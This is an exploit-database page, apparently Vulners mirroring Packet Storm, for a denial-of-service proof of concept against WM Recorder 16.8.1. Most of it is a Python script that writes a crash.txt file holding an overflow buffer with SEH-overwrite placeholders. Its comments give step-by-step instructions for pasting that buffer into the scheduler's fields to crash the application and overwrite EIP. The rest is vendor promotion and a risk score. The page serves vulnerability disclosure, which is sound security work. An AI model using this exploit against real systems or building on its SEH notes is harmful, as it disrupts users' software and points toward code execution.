Lucene search
K

WM Recorder 16.8.1 Denial Of Service

🗓️ 23 Mar 2018 00:00:00Reported by bzyoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

WM Recorder 16.8.1 Denial Of Service exploit, creating crash.txt file with specific content causing application cras

Code
`#!/usr/bin/python  
  
#  
# Exploit Author: bzyo  
# Twitter: @bzyo_  
# Exploit Title: WM Recorder 16.8.1 - Denial of Service  
# Date: 03-20-2018  
# Vulnerable Software: WM Recorder 16.8.1  
# Vendor Homepage: http://wmrecorder.com/home/  
# Version: 16.8.1  
# Software Link: http://wmrecorder.com/download/wm-recorder/  
# Tested On: Windows 7 x86/x64, Windows 10 x64  
#  
#  
# PoC: generate crash.txt, open app, go to Schedule Recordings, Open Scheduler, paste crash.txt contents in Stream URL, File name and Website URL,  
# change End Recording date to future date, turn scheduler on, select OK  
#  
# app crashes & EIP overwrite;  
# !mona seh > no ppr pointers & !mona seh -all > all aslr/safeseh  
# lots of bad chars including \x90  
#  
  
filename="crash.txt"  
  
junk = "\x41"*429  
  
nseh = "\x42"*4  
  
seh = "\x43"*4  
  
fill = "\x44"*9562  
  
buffer = junk + nseh + seh + fill  
  
textfile = open(filename , 'w')  
textfile.write(buffer)  
textfile.close()  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Mar 2018 00:00Current
7.1High risk
Vulners AI Score7.1
18